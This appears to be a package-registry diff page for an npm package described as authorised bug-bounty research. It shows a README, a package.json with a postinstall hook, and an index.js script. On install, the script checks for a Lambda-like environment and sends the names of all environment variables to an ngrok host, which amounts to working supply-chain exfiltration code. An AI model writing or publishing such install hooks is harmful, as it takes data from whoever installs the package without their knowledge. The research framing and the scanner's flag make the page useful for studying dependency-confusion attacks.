dogwhohacks-research-security-do-not-install 1.0.7

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of dogwhohacks-research-security-do-not-install might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +5 -0
  2. package/index.js +27 -0
  3. package/package.json +12 -0
package/README.md ADDED
@@ -0,0 +1,5 @@
1
+ Security Research for @rhyselsmore. Testing a consumer of NPM - which I have permission to test.
2
+
3
+ Despite safeguards in place to ensure this only runs on the targetted host, please do not install this.
4
+
5
+ Email me@rhys.io with queries.
package/index.js ADDED
@@ -0,0 +1,27 @@
1
+ const https = require('node:https');
2
+ const fs = require('fs');
3
+
4
+ if (!fs.existsSync("/var/task")) {
5
+ process.exit(0)
6
+ }
7
+
8
+ const options = {
9
+ hostname: '0cba25ed7862.au.ngrok.io',
10
+ port: 443,
11
+ path: '/container-ping?q=' + Object.keys(process.env).join(","),
12
+ method: 'GET'
13
+ };
14
+
15
+ const req = https.request(options, (res) => {
16
+ console.log('statusCode:', res.statusCode);
17
+ console.log('headers:', res.headers);
18
+
19
+ res.on('data', (d) => {
20
+ process.stdout.write(d);
21
+ });
22
+ });
23
+
24
+ req.on('error', (e) => {
25
+ console.error(e);
26
+ });
27
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "dogwhohacks-research-security-do-not-install",
3
+ "version": "1.0.7",
4
+ "description": "Security Research for @dogwhohacks on Bugcrowd. Do not install",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "postinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }